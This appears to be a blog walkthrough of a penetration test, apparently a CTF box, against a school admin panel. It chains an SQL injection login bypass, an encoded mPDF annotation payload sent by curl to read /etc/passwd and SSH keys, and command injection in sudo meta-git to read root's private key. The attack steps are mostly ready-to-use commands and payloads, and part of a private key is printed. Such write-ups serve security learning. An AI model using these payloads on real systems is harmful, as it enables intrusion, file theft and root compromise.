hosting image

Pentest mPDF read any file and meta-git RCE to root

Situation:

  • School Admin Panel with Pdf download option using mpdf.

 

logged in as admin with sql injection bypass ‘or 1=’1’#.

 

 

Using Burp Suite checking the request

 

 

Decrypting it using base64 decrypt 

 

 

Interesting info from GitHub 

 

using CyberChef :

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

 

 

 

CMD

❯ curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Y y9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGF zc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1M jB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V 0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyM iUyNTIwLyUyNTNF"

 

Result Output:
OKdAtpf213e12edyJeFWPExZ0H.pdf

 

CMD AGAIN

❯ curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf

 

Reading the pdf  i was able to read passwd.
then i was able to read id_rsa  and get ssh access ! 
Next Root ~# using linpease , pspsy have nothing intresting.
exec sudo -l
result: 
User may run the following commands on faculty:(root) /usr/local/bin/meta-git
found this report online informing there is exec p0c in npm : https://hackerone.com/reports/728040
Github Check !
time to do Proof :
xxxxx@xxxxxxxxxxxx:/$ sudo -u root 
meta-git clone 'tcpguard| whoami' 
meta git cloning into 'tcpguard| whoami' at tcpguard| 
whoami tcpguard| whoami: fatal: repository 'tcpguard' does not exist 
whoami: ‘tcpguard’: no such user root

 

trying to read root ssh key

user@xxxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| cat ~/.ssh/id_rsa' 
meta git cloning into 'tcpguard| cat ~/.ssh/id_rsa' at id_rsa 
id_rsa: fatal: repository 'tcpguard' does not exist
 -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAA
AAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAxDAgrHcD2I4U329//sdapn4ncVzRYZxACC/cz
xmSO5Us2S87dxyw izZ0hDszHyk+bCB5B1wvrtmAFu2KN4aGCoAJMNGmVocBnIkSczGp/zBy0pVK6H7g6GM
AVS pribX/DrdHCcmsIu7WqkyZ0mDN2sS+3uMk6I3361x2ztAG1aC9xJX7EJsHmXDRLZ8G1Rib KpI0WqAW
NSXHDDvcwDpmWDk+NlIRKkpGcV.....

 

....

rooted !~#


Leave a Reply

Your email address will not be published. Required fields are marked *